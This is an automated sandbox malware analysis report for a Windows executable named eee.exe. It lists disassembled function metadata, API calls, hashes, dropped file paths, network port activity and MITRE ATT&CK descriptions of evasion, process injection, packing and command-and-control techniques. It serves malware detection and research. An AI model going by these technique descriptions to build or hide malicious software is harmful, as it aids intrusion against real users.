Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateValue_strlen
String ID: Softwarh
API String ID: 312538125-4028069412
Opcode ID: 7d61a34bea6f9b1a2b949e84e5f5bd5c8d273dcd0518ecf3e3e05ccedf2c85dd
Instruction ID: 3f79f9e9aba60741bc791617f394cabde9d748c0c145b2a0579f94bcbd2b7165
Opcode Fuzzy Hash: 7d61a34bea6f9b1a2b949e84e5f5bd5c8d273dcd0518ecf3e3e05ccedf2c85dd
Instruction Fuzzy Hash: 2731B6712043446BE334CA148C55FEBB7E9EBC8710F50892DF7899B1C0DB75E5498795

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__shift.LIBCMT ref: 0040FB77

Part of subcall function 0040FB37: _strlen.LIBCMT ref: 0040FB3F

_strcat.LIBCMT ref: 0040FBB4

Strings

e+000, xrefs: 0040FBA6

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: __shift_strcat_strlen
String ID: e+000
API String ID: 208078240-1027065040
Opcode ID: 0695441ecb89629865e81bde4908c6e617fbcff1f783e0ceda6d6bcf358019a6
Instruction ID: 182cadfcc4df94418bc887b868bbb400ebe622709186eb138d4f36767b5db08b
Opcode Fuzzy Hash: 0695441ecb89629865e81bde4908c6e617fbcff1f783e0ceda6d6bcf358019a6
Instruction Fuzzy Hash: B821F6712083905FD72A4A38CCA07953BE45B02314F1884BFE085CB2D2D67DD989CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00408E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00408E62
FreeLibrary.KERNEL32(00000000), ref: 00408EC6

Part of subcall function 0040A470: LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040A506
Part of subcall function 0040A470: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 0040A512
Part of subcall function 0040A470: LoadLibraryA.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0040A57D

Strings

QuickTime.qts, xrefs: 00408E3B

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Library$Load$ErrorFileFreeLastModuleName
String ID: QuickTime.qts
API String ID: 856802638-361037960
Opcode ID: 7f183b4fddeb1842260df996d0a25f06eef80e151d9e8e23157b0cbb8cf5b520
Instruction ID: 1d3db457e0a1f08217f910dfdfaea686186e5211df05db95bd2bcb6d4462dc93
Opcode Fuzzy Hash: 7f183b4fddeb1842260df996d0a25f06eef80e151d9e8e23157b0cbb8cf5b520
Instruction Fuzzy Hash: 7821F0726043014FD310DF28DC81AEBBBD5EB88304F05453EE995E3391EB7898498BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00412555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 00412567
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eee.exe,00000104,771C1100,00000000,?,?,?,?,0040F1DC,?,004189C0,00000060), ref: 0041257F

Strings

C:\Users\user\Desktop\eee.exe, xrefs: 00412571, 00412576

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FileModuleName___initmbctable
String ID: C:\Users\user\Desktop\eee.exe
API String ID: 767393020-2594332130
Opcode ID: c6f7c73b5849518373d4dcdaa8bd02a57f0e271fc9efaa78d7796da3c9516e6c
Instruction ID: c744bd1ab4c517f48d7c977abfc73b43d478bd77aaece5de618230cd50028b02
Opcode Fuzzy Hash: c6f7c73b5849518373d4dcdaa8bd02a57f0e271fc9efaa78d7796da3c9516e6c
Instruction Fuzzy Hash: 0D11E7B2B04114FBDB10CBAAEDC19DF77A9EB44360B11017BF805D3241E6B89E45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004138B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00419238,00000010,0040F941,00000000,00000FA0,00418BD8,00000008,0040F9A9,0040F6E6,?,?,00411EC0,00000008,00418D38,00000008), ref: 004138D4
GetProcAddress.KERNEL32(00000000,0041920C), ref: 004138E4

Strings

kernel32.dll, xrefs: 004138CF

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: b43e9344644ddee4a0d6cb00ee23f1694acab1d25af4075d48e1e99720bd54ec
Instruction ID: e0cbe0ab0c4e3b1101bd0d2d419e2331d8a56b326b581b45c8b11af4c02ee863
Opcode Fuzzy Hash: b43e9344644ddee4a0d6cb00ee23f1694acab1d25af4075d48e1e99720bd54ec
Instruction Fuzzy Hash: 09F0D070680306AACB10AFB5DC067D93BA4BB05756B14C67AF421E62A0DB7C86849F1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411651 Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00418A10,00411C42,00418A10,0040F6E6,00000000,00000000,00000001,00000000,0040F6E6), ref: 00411678
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00418A10,00411C42,00418A10,0040F6E6,00000000,00000000,00000001,00000000,0040F6E6), ref: 004116B1
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004116CF
HeapFree.KERNEL32(00000000,?), ref: 004116E6

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 7f9b3409c4b421abccefa3a005735216f9fb6af9d1e8351fb4b5b896684b7dbd
Instruction ID: 763d147683030d5a2b598682e9e6225717e20a728595eb7f15218bec4a08883d
Opcode Fuzzy Hash: 7f9b3409c4b421abccefa3a005735216f9fb6af9d1e8351fb4b5b896684b7dbd
Instruction Fuzzy Hash: DF1133B1600701AFC7258F28FC45DD67BB5FB813507108A2EF562C61B0D7B59842CB48

Uniqueness

Uniqueness Score: -1.00%

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eee.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\e8bd7ec2

C:\Users\user\AppData\Local\Temp\igwjsumi

C:\Users\user\AppData\Roaming\JWMACKAFRTBA\BGBUIPGHWHW

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
eee.exe

Function 00405EA5 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 679
COMMON

Function 00406430 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464
memoryCOMMON

Function 00405E60 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 422
windowCOMMON

Function 00407A20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Function 00407A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99
COMMON

Function 00407A60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Function 00407A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79
COMMON

Function 00407AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Function 00407AC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Function 00406450 Relevance: 3.3, APIs: 2, Instructions: 281
COMMON

Function 004050DA Relevance: 3.3, APIs: 2, Instructions: 256
librarymemoryCOMMON

Function 00407000 Relevance: 3.2, APIs: 2, Instructions: 176
COMMON

Function 00414521 Relevance: 3.1, APIs: 2, Instructions: 70
memoryCOMMONLIBRARYCODE

Function 00408914 Relevance: 3.1, APIs: 2, Instructions: 55
fileCOMMON

Function 0040F292 Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE